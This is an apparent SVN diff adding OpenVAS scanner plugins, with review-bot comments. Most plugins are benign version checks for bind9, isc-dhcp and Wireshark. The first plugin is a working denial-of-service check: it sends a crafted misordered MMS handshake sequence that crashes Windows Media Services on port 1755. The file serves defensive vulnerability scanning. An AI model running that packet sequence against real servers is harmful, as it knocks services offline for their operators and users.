+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Microsoft Windows Media Service Handshake Sequence DoS Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802888);
+ script_version("$Revision$");
+ script_cve_id("CVE-2000-0211");
+ script_bugtraq_id(1000);
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 13:22:23 +0530 (Mon, 30 Jul 2012)");
+ script_name("Microsoft Windows Media Service Handshake Sequence DoS Vulnerability");
+ desc = "
+ Overview: This host is running Microsoft Windows Media Service and is prone
+ to denial of service vulnerability.
+
+ Vulnerability Insight:
+ The handshake sequence between a Windows Media server and a Windows Media
+ Player occurs in a particular order. If a series of client handshake packets
+ are sent in a particular misordered sequence, with certain timing
+ constraints, the server attempts to use a resource before it has been
+ initialized causing the Windows Media Unicast Service to crash.
+
+ Impact:
+ Successful exploitation could allow remote attackers to cause denial of
+ service conditions.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Microsoft Windows 2000
+ Microsoft Windows NT 4.0
+ Windows Media Services 4.0 and 4.1
+
+ Fix:
+ Run Windows Update and update the listed hotfixes or download and
+ update mentioned hotfixes in the advisory from the below link,
+ http://technet.microsoft.com/en-us/security/bulletin/ms00-013
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/4034
+ http://www.exploit-db.com/exploits/19759
+ http://technet.microsoft.com/en-us/security/bulletin/fq00-013
+ http://support.microsoft.com/default.aspx?scid=kb;[LN];253943
+ http://technet.microsoft.com/en-us/security/bulletin/ms00-013 ";
+
+ script_description(desc);
+ script_summary("Check if Windows Media Services is vulnerable to DoS");
+ script_category(ACT_DENIAL);
+ script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
+ script_family("Windows : Microsoft Bulletins");
+ script_require_ports(1755);
+ exit(0);
+ }
+
+
+## Variable Initialization
+soc1 = 0;
+soc2 = 0;
+mss_req1 = "";
+mss_req2 = "";
+mss_req3 = "";
+mss_req4 = "";
+mss_req5 = "";
+mss_req6 = "";
+mss_req7 = "";
+mss_res = "";
+
+## Media Service Port
+port = 1755;
+
+## Check Port State
+if(!get_port_state(port)){
+ exit(0);
+}
+
+## Open the socket
+soc1 = open_sock_tcp(port);
+if(!soc1){
+ exit(0);
+}
+
+## Construct Microsoft Media Service connection request
+mss_req1 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, ## Command Signature
+ 0xa0, 0x00, 0x00, 0x00, ## Command Length
+ 0x4d, 0x4d, 0x53, 0x20, ## Protocol Type : MMS (Microsoft Media Server)
+ 0x14, 0x00, 0x00, 0x00, ## Length until end
+ 0x00, 0x00, 0x00, 0x00, ## Sequence number
+ 0xf8, 0x53, 0xe3, 0xa5, 0x9b, 0xc4, 0x00, 0x40, ## Time Stamp
+ 0x12, 0x00, 0x00, 0x00, ## Length until end
+ 0x01, 0x00, ## Cmd : Connect Info (0x0001)
+ 0x03, 0x00, ## Cmd Direction : to Server (0x0003)
+ 0xf0, 0xf0, 0xf0, 0xf0, ## Prefix 1
+ 0x0b, 0x00, 0x04, 0x00, ## Prefix 2
+ 0x1c, 0x00, 0x03, 0x00, 0x4e, 0x00, 0x53, 0x00, 0x50, ## Player Info
+ 0x00, 0x6c, 0x00, 0x61, 0x00, 0x79, 0x00, 0x65, 0x00,
+ 0x72, 0x00, 0x2f, 0x00, 0x34, 0x00, 0x2e, 0x00, 0x31,
+ 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x33, 0x00,
+ 0x38, 0x00, 0x35, 0x00, 0x37, 0x00, 0x3b, 0x00, 0x20,
+ 0x00, 0x7b, 0x00, 0x30, 0x00, 0x32, 0x00, 0x64, 0x00,
+ 0x30, 0x00, 0x63, 0x00, 0x32, 0x00, 0x63, 0x00, 0x30,
+ 0x00, 0x2d, 0x00, 0x62, 0x00, 0x35, 0x00, 0x30, 0x00,
+ 0x37, 0x00, 0x2d, 0x00, 0x31, 0x00, 0x31, 0x00, 0x64,
+ 0x00, 0x32, 0x00, 0x2d, 0x00, 0x39, 0x00, 0x61, 0x00,
+ 0x61, 0x00, 0x38, 0x00, 0x2d, 0x00, 0x62, 0x00, 0x37,
+ 0x00, 0x30, 0x00, 0x66, 0x00, 0x33, 0x00, 0x30, 0x00,
+ 0x34, 0x00, 0x34, 0x00, 0x61, 0x00, 0x65, 0x00, 0x37,
+ 0x00, 0x65, 0x00, 0x7d, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00);
+
+send(socket:soc1 , data: mss_req1);
+mms_res = recv(socket:soc1, length:512);
+
+## Confirm if its Microsoft Media service
+if(!mms_res || "MMS" >!< mms_res)
+{
+ close(soc1);
+ exit(0);
+}
+
+## Microsoft Media Service Transer Request to Server
+## Construct Misordered Handshake Sequences
+mss_req2 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x20,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x04, 0x00,
+ 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x5e, 0xba, 0x49,
+ 0x0c, 0x02, 0x2b, 0x01, 0x40, 0x02, 0x00, 0x00, 0x00,
+ 0x18, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0x0b,
+ 0x00, 0x04, 0x00);
+
+mss_req3 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x60,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x0c, 0x00,
+ 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x83, 0xc0, 0xca,
+ 0xa1, 0x45, 0xb6, 0x01, 0x40, 0x0a, 0x00, 0x00, 0x00,
+ 0x02, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0xff,
+ 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0xa0, 0x00, 0x02, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x5c,
+ 0x00, 0x31, 0x00, 0x39, 0x00, 0x32, 0x00, 0x2e, 0x00,
+ 0x31, 0x00, 0x36, 0x00, 0x38, 0x00, 0x2e, 0x00, 0x30,
+ 0x00, 0x2e, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x54, 0x00,
+ 0x43, 0x00, 0x50, 0x00, 0x5c, 0x00, 0x31, 0x00, 0x31,
+ 0x00, 0x31, 0x00, 0x31, 0x00, 0x00, 0x00, 0x32, 0x00,
+ 0x63, 0x00, 0x30, 0x00);
+
+mss_req4 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x88,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x11, 0x00,
+ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x2b, 0x87, 0x16,
+ 0xd9, 0xce, 0xf7, 0x01, 0x40, 0x0f, 0x00, 0x00, 0x00,
+ 0x05, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff,
+ 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x54, 0x00, 0x68, 0x00, 0x65, 0x00, 0x20,
+ 0x00, 0x45, 0x00, 0x61, 0x00, 0x67, 0x00, 0x6c, 0x00,
+ 0x65, 0x00, 0x73, 0x00, 0x20, 0x00, 0x54, 0x00, 0x65,
+ 0x00, 0x71, 0x00, 0x75, 0x00, 0x69, 0x00, 0x6c, 0x00,
+ 0x61, 0x00, 0x20, 0x00, 0x53, 0x00, 0x75, 0x00, 0x6e,
+ 0x00, 0x72, 0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00,
+ 0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x6b, 0x00, 0x2f,
+ 0x00, 0x65, 0x00, 0x61, 0x00, 0x67, 0x00, 0x6c, 0x00,
+ 0x65, 0x00, 0x73, 0x00, 0x32, 0x00, 0x38, 0x00, 0x2e,
+ 0x00, 0x61, 0x00, 0x73, 0x00, 0x66, 0x00, 0x00, 0x00,
+ 0x62, 0x00, 0x37, 0x00, 0x30, 0x00, 0x66, 0x00);
+
+mss_req5 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x48,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x09, 0x00,
+ 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x67, 0x66, 0x66,
+ 0x66, 0x66, 0x66, 0x02, 0x40, 0x07, 0x00, 0x00, 0x00,
+ 0x15, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80,
+ 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x65, 0x00, 0x20,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0xac, 0x40, 0x02,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00);
+
+mss_req6 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x30,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x06, 0x00,
+ 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0a, 0xd7, 0xa3,
+ 0x70, 0x3d, 0x0a, 0x11, 0x40, 0x04, 0x00, 0x00, 0x00,
+ 0x33, 0x00, 0x03, 0x00, 0x02, 0x00, 0x00, 0x00, 0xff,
+ 0xff, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0x02, 0x00,
+ 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x65, 0x00, 0x20,
+ 0x00);
+
+mss_req7 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x38,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x07, 0x00,
+ 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x2f, 0xdd, 0x24,
+ 0x06, 0x81, 0x15, 0x11, 0x40, 0x05, 0x00, 0x00, 0x00,
+ 0x07, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff,
+ 0xff, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+ 0xff, 0x16, 0xca, 0x03, 0x80, 0x04, 0x00, 0x00, 0x00);
+
+## Send the Misordered Handshake Sequence
+send(socket:soc1 , data: mss_req2);
+send(socket:soc1 , data: mss_req3);
+send(socket:soc1 , data: mss_req4);
+send(socket:soc1 , data: mss_req5);
+send(socket:soc1 , data: mss_req6);
+send(socket:soc1 , data: mss_req7);
+res = recv(socket:soc1, length:1024);
+
+sleep(7);
+close(soc1);
+
+soc2 = open_sock_tcp(port);
+
+## Confirm Windows Media Unicast Service crashed
+## If couldn't open soc then mms is crashed
+if(!soc2)
+{
+ security_warning(port);
+ exit(0);
+}
+else
+{
+ ## Send the Connect request again
+ ## Confirm it doesnot responds
+ send(socket:soc2 , data: mss_req1);
+ mms_res = recv(socket:soc2, length:512);
+ close(soc2);
+
+ if(!mms_res || "MMS" >!< mms_res){
+ security_warning(port);
+ }
+}
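Review bot: The variable initialization block sets `mss_res = "";`, but every response is stored in `mms_res`, so the variable actually used is never initialized; the line should read `mms_res = "";`. The value assigned by `res = recv(socket:soc1, length:1024);` is never read and `res` is not initialized either. The crash confirmation rests on a single `open_sock_tcp(port)` after a fixed `sleep(7)`, so a transient network failure or a filtered reconnect would presumably be reported as a vulnerable host. A second connection attempt before `security_warning(port)` would cut those false positives. The script also leaves the target service down when the check succeeds, which deserves a line in `desc` for operators who enable `ACT_DENIAL` checks.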
Property changes on: trunk/openvas-plugins/scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_ubuntu_USN_1518_1.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ubuntu_USN_1518_1.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_ubuntu_USN_1518_1.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,133 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Ubuntu Update for bind9 USN-1518-1
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ Einar Lonn discovered that Bind incorrectly initialized the failing-query
+ cache. A remote attacker could use this flaw to cause Bind to crash,
+ resulting in a denial of service.
+
+ Affected Software/OS:
+ bind9 on Ubuntu 12.04 LTS ,
+ Ubuntu 11.10 ,
+ Ubuntu 11.04 ,
+ Ubuntu 10.04 LTS
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ https://lists.ubuntu.com/archives/ubuntu-security-announce/2012-July/001771.html ";
+
+if(description)
+{
+ script_id(841094);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:51 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3817");
+ script_tag(name:"cvss_base", value:"7.8");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "USN", value: "1518-1");
+ script_name("Ubuntu Update for bind9 USN-1518-1");
+
+ script_description(desc);
+ script_summary("Check for the Version of bind9");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Ubuntu Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("login/SSH/success", "HostDetails/OS/cpe:/o:canonical:ubuntu_linux", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-deb.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "UBUNTU10.04 LTS")
+{
+
+ if ((res = isdpkgvuln(pkg:"libdns64", ver:"9.7.0.dfsg.P1-1ubuntu0.6", rls:"UBUNTU10.04 LTS")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "UBUNTU12.04 LTS")
+{
+
+ if ((res = isdpkgvuln(pkg:"libdns81", ver:"9.8.1.dfsg.P1-4ubuntu0.2", rls:"UBUNTU12.04 LTS")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "UBUNTU11.10")
+{
+
+ if ((res = isdpkgvuln(pkg:"libdns69", ver:"9.7.3.dfsg-1ubuntu4.3", rls:"UBUNTU11.10")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "UBUNTU11.04")
+{
+
+ if ((res = isdpkgvuln(pkg:"libdns69", ver:"9.7.3.dfsg-1ubuntu2.5", rls:"UBUNTU11.04")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_ubuntu_USN_1518_1.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_ubuntu_USN_1519_1.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ubuntu_USN_1519_1.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_ubuntu_USN_1519_1.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,122 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Ubuntu Update for isc-dhcp USN-1519-1
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ Markus Hietava discovered that the DHCP server incorrectly handled certain
+ malformed client identifiers. A remote attacker could use this issue to
+ cause DHCP to crash, resulting in a denial of service. (CVE-2012-3571)
+
+ Glen Eustace discovered that the DHCP server incorrectly handled memory. A
+ remote attacker could use this issue to cause DHCP to crash, resulting in a
+ denial of service. (CVE-2012-3954)
+
+ Affected Software/OS:
+ isc-dhcp on Ubuntu 12.04 LTS ,
+ Ubuntu 11.10 ,
+ Ubuntu 11.04
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ https://lists.ubuntu.com/archives/ubuntu-security-announce/2012-July/001772.html ";
+
+if(description)
+{
+ script_id(841095);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:54 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3571", "CVE-2012-3954");
+ script_tag(name:"cvss_base", value:"6.1");
+ script_tag(name:"cvss_base_vector", value:"AV:A/AC:L/Au:N/C:N/I:N/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "USN", value: "1519-1");
+ script_name("Ubuntu Update for isc-dhcp USN-1519-1");
+
+ script_description(desc);
+ script_summary("Check for the Version of isc-dhcp");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Ubuntu Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("login/SSH/success", "HostDetails/OS/cpe:/o:canonical:ubuntu_linux", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-deb.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "UBUNTU12.04 LTS")
+{
+
+ if ((res = isdpkgvuln(pkg:"isc-dhcp-server", ver:"4.1.ESV-R4-0ubuntu5.2", rls:"UBUNTU12.04 LTS")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "UBUNTU11.10")
+{
+
+ if ((res = isdpkgvuln(pkg:"isc-dhcp-server", ver:"4.1.1-P1-17ubuntu10.3", rls:"UBUNTU11.10")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "UBUNTU11.04")
+{
+
+ if ((res = isdpkgvuln(pkg:"isc-dhcp-server", ver:"4.1.1-P1-15ubuntu9.4", rls:"UBUNTU11.04")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
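Review bot: `script_tag(name:"risk_factor", value:"High");` sits next to a `cvss_base` of 6.1 with vector AV:A/AC:L/Au:N/C:N/I:N/A:C, an adjacent-network, availability-only score that falls in the CVSS v2 medium band. The Wireshark ASN.1 BER check in this same commit labels 5.0 as Medium. If risk_factor is meant to follow the CVSS score, this line should read `script_tag(name:"risk_factor", value:"Medium");`, otherwise results from this check are ranked above where its own score places them. The header marks the file as a system-generated check, so the mapping probably needs correcting in the generator rather than by hand.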
Property changes on: trunk/openvas-plugins/scripts/gb_ubuntu_USN_1519_1.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Wireshark ASN.1 BER Dissector Denial of Service Vulnerability (Mac OS X)
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802665);
+ script_version("$Revision$");
+ script_bugtraq_id(45775);
+ script_cve_id("CVE-2011-0445");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 17:17:17 +0530 (Mon, 30 Jul 2012)");
+ script_name("Wireshark ASN.1 BER Dissector Denial of Service Vulnerability (Mac OS X)");
+ desc = "
+ Overview: This host is installed with Wireshark and is prone to denial of
+ service vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused by an assertion error in the ASN.1 BER dissector, which
+ could be exploited to crash an affected application.
+
+ Impact:
+ Successful exploitation will allow attackers to create a denial of service.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Wireshark versions 1.4.0 through 1.4.2 on Mac OS X
+
+ Fix: Upgrade to the latest version of Wireshark 1.4.3 or later,
+ For updates refer, http://www.wireshark.org/download
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/64625
+ http://www.vupen.com/english/advisories/2011/0079
+ http://www.wireshark.org/security/wnpa-sec-2011-02.html
+ https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5537 ";
+
+ script_description(desc);
+ script_summary("Check for the version of Wireshark on Mac OS X");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2012 Greenbone Networks GmbH");
+ script_family("Denial of Service");
+ script_dependencies("gb_wireshark_detect_macosx.nasl");
+ script_require_keys("Wireshark/MacOSX/Version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Variable Initialization
+sharkVer = "";
+
+## Get version from KB
+sharkVer = get_kb_item("Wireshark/MacOSX/Version");
+if(!sharkVer){
+ exit(0);
+}
+
+## Check for vulnerable Wireshark versions
+if(version_in_range (version:sharkVer, test_version:"1.4.0", test_version2:"1.4.2")) {
+ security_warning(0);
+}
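Review bot: The finding is raised with a bare `security_warning(0);`, so the report does not show the Wireshark version read from `Wireshark/MacOSX/Version`. Whoever triages it cannot tell a genuine 1.4.0 through 1.4.2 install from a stale or mis-detected KB entry. Because this is a version comparison only, the evidence belongs in the result: define `desc` before `if(description)`, as the Ubuntu checks in this commit do, and report with `security_warning(port:0, data:"Installed Wireshark version: " + sharkVer + '\n' + desc);`. The same applies to `security_hole(0);` in gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl. The `sharkVer = "";` initialisation can be dropped, since the next statement overwrites it.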
Property changes on: trunk/openvas-plugins/scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Wireshark MAC-LTE dissector Buffer Overflow Vulnerability (Mac OS X)
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802664);
+ script_version("$Revision$");
+ script_bugtraq_id(45775);
+ script_cve_id("CVE-2011-0444");
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 17:17:17 +0530 (Mon, 30 Jul 2012)");
+ script_name("Wireshark MAC-LTE dissector Buffer Overflow Vulnerability (Mac OS X)");
+ desc = "
+ Overview: This host is installed with Wireshark and is prone to buffer
+ overflow vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused by a buffer overflow error in the MAC-LTE dissector,
+ which could be exploited to crash an affected application or compromise
+ a vulnerable system.
+
+ Impact:
+ Successful exploitation will allow attackers to create a denial of service
+ or execute arbitrary code.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ Wireshark versions 1.2.0 through 1.2.13 and 1.4.0 through 1.4.2 on Mac OS X
+
+ Fix: Upgrade to the latest version of Wireshark 1.4.3 or later,
+ For updates refer, http://www.wireshark.org/download
+
+ References:
+ http://osvdb.org/70403
+ http://xforce.iss.net/xforce/xfdb/64624
+ http://www.vupen.com/english/advisories/2011/0079
+ http://www.wireshark.org/security/wnpa-sec-2011-02.html
+ https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5530 ";
+
+ script_description(desc);
+ script_summary("Check for the version of Wireshark on Mac OS X");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2012 Greenbone Networks GmbH");
+ script_family("Buffer overflow");
+ script_dependencies("gb_wireshark_detect_macosx.nasl");
+ script_require_keys("Wireshark/MacOSX/Version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Variable Initialization
+sharkVer = "";
+
+## Get version from KB
+sharkVer = get_kb_item("Wireshark/MacOSX/Version");
+if(!sharkVer){
+ exit(0);
+}
+
+## Check for vulnerable Wireshark versions
+if(version_in_range (version:sharkVer, test_version:"1.2.0", test_version2:"1.2.13") ||
+ version_in_range (version:sharkVer, test_version:"1.4.0", test_version2:"1.4.2")) {
+ security_hole(0);
+}
